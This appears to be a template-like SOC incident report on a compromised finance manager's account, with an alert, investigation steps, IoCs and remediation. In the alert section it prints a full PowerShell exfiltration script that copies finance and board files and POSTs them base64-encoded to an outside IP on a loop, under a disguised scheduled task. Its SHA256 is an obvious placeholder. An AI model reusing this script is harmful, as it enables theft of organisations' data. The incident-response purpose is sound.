Varonis Alert Details
Alert ID: VARONIS-AUTO-EXFIL-1020-7842 Alert Time: 2024-03-03 09:30:15 EST Severity: CRITICAL (95/100) Source: Varonis Data Security Platform Rule: “Automated Data Collection Script Detected – Potential Mass Exfiltration” MITRE ATT&CK: T1020 – Automated Exfiltration
Alert Details:
Detection: PowerShell script automatically collecting and exfiltrating data at regular intervals
User: kwilson@company.com (Karen Wilson, Finance Manager) Host: FIN-WS-112 Time: 09:15-09:30 EST
Script Details:
Path: C:\Users\kwilson\AppData\Local\Temp\backup.ps1
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Scheduled Task: “FinanceBackup” (created 09:00)
Trigger: Every 30 minutes
Script Content:
while($true) {
$targets = @(
“\\filesrv\finance\reports\*.xlsx”,
“\\filesrv\finance\budgets\*.xlsx”,
“\\filesrv\executive\board\*.docx”,
“C:\Users\kwilson\Documents\*.xlsx”,
“C:\Users\kwilson\Desktop\*.docx”
)
$zipFile = “C:\temp\data_$(Get-Date -Format ‘yyyyMMddHHmm’).zip”
$tempDir = “C:\temp\collect”
New-Item -ItemType Directory -Path $tempDir -Force
foreach ($target in $targets) {
Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
}
Compress-Archive -Path $tempDir\* -DestinationPath $zipFile -Force
Remove-Item -Path $tempDir -Recurse -Force
# Exfiltrate
$bytes = [System.IO.File]::ReadAllBytes($zipFile)
$b64 = [System.Convert]::ToBase64String($bytes)
$body = @{data=$b64} | ConvertTo-Json
Invoke-WebRequest -Uri http://185.143.221[.]89/upload -Method POST -Body $body
Remove-Item $zipFile
Start-Sleep -Seconds 1800
}
Automated Exfiltration Log:
09:00 – Script started (scheduled task)
09:01 – First collection: 234 files (45 MB)
09:02 – Exfiltration of 45 MB to 185.143.221[.]89
09:30 – Second collection in progress (detected)
Detection Logic:
Script runs automatically every 30 minutes
Collects data from multiple sensitive locations
Exfiltrates immediately after collection
Pattern matches automated, continuous exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Varonis alert
Varonis Console
Confirmed automated exfiltration script
2. Process Investigation
Identify scheduled task
CrowdStrike Falcon
“FinanceBackup” task running PowerShell script
3. User Interview
Contact kwilson
Teams, Phone
User did NOT create script (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
FIN-WS-112 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
185.143.221[.]89 blocked
6. Account Remediation
Disable kwilson account
Azure AD, AD
Account disabled; password reset
Jira Incident Report
Ticket: SOC-2024-161 Summary: T1020 – Automated Exfiltration of 45 MB Every 30 Minutes Status: RESOLVED Resolution: MALICIOUS – Automated Exfiltration Stopped Priority: P1 – CRITICAL Labels: T1020, automated-exfiltration, powershell, varonis, compromised-account Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Automated Data Collection Script Detected – Potential Mass Exfiltration”.
User: kwilson@company.com (Finance Manager).
Host: FIN-WS-112.
Script: backup.ps1 running every 30 minutes.
Data: 45 MB exfiltrated in first run.
Time: 2024-03-03 09:30 EST.
Technique: MITRE ATT&CK T1020 – Automated Exfiltration.
2. Technical Analysis:
Attack Chain:
08:30 – kwilson account compromised via phishing
08:45 – Attacker logs into FIN-WS-112 via RDP
08:50 – Attacker creates backup.ps1 script
09:00 – Attacker creates scheduled task “FinanceBackup”
09:01 – First automated run (45 MB exfiltrated)
09:30 – Second run begins; Varonis detects
Script Analysis:
Collection: Files from finance shares, executive shares, local folders
Frequency: Every 30 minutes (ensures new files are captured)
Exfiltration: HTTP POST to 185.143.221[.]89
Persistence: Scheduled task runs as user
Data Exfiltrated (First Run – 45 MB):
Finance reports (23 files) – 18 MB
Budget spreadsheets (12 files) – 15 MB
Executive board documents (5 files) – 8 MB
Personal finance documents (user’s) – 4 MB
Attacker Intent:
Establish persistent, automated exfiltration
Continuously steal new data as it’s created
Evade detection by using small, frequent transfers
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50-09:00 – Script and task created
09:01 – First exfiltration (45 MB)
09:30 – Second run starts
09:30 – Varonis alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – Script and task removed
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\backup.ps1 (SHA256: a1b2c3d4…)
Scheduled Task:
– “FinanceBackup” (every 30 minutes)
Network:
– Destination: 185.143.221[.]89:80
– Pattern: POST /upload every 30 minutes
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-112 via CrowdStrike.
Disabled scheduled task.
Deleted backup.ps1.
Blocked destination IP at firewall.
Disabled kwilson account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (45 MB in first run).
Notified affected data owners.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to automated exfiltration setup.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Script execution allowed (no application control).
6. Business Impact:
Operational Impact: Finance host offline; user offline.
Data Exposure: 45 MB of financial and executive data exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Automated exfiltration stopped.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented application control.
Enhanced Varonis monitoring for automated collection patterns.
8. Conclusion:
An attacker compromised a finance manager’s account and set up an automated exfiltration script that ran every 30 minutes, stealing 45 MB of data in its first run. Varonis detected the automated pattern and enabled rapid containment before the second run could complete.
Closure Rationale: Automated exfiltration stopped; data exfiltrated (45 MB); account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-03 10:30 EST